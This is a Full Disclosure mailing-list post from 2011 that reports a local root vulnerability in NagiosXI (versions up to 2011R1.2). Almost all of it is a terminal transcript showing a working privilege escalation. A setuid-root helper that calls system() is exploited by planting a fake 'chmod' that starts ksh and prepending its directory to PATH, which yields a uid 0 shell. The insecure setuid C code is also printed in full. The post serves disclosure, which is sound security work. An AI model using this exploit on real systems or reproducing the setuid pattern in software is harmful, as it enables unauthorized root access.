Full Disclosure: NagiosXI (commerciale Nagios) Local Root

[rootbsd <rootbsd () r00ted com>]

# Exploit Title: NagiosXI (Commercial Nagios) Local Root Vulnerability
# Date: 2011-05-15
# Author: RootBSD
# Software Link: http://www.nagios.com
# Version: <= 2011R1.2
# Tested on: all linux

rootbsd () laptop:~$ id
uid=1001(rootbsd) gid=1001(rootbsd) groupes=1001(rootbsd)
rootbsd () laptop:~$ ls -l /usr/local/nagiosxi/scripts/reset_config_perms
-rwsr-xr-x 1 root nagios 5258 2011-04-11 20:38 reset_config_perms
rootbsd () laptop:~$ cat /usr/local/nagiosxi/scripts/reset_config_perms.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   if(setuid( 0 )!=0)
        printf("ERROR TRYING TO SETUID ROOT!\n");
        else
                printf("SETUID ROOT OK\n");
   system( "/usr/local/nagiosxi/scripts/reset_config_perms.sh" );

   return 0;
}


rootbsd () laptop:~$ cat /home/rootbsd/chmod
#!/usr/bin/ksh
ksh
rootbsd () laptop:~$ chmod 755 /home/rootbsd/chmod
rootbsd () laptop:~$ export PATH=/home/rootbsd:$PATH
rootbsd () laptop:~$ /usr/local/nagiosxi/scripts/reset_config_perms
SETUID ROOT OK
RESETTING PERMS
# id
uid=0(root) gid=0(root) groupes=0(root)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/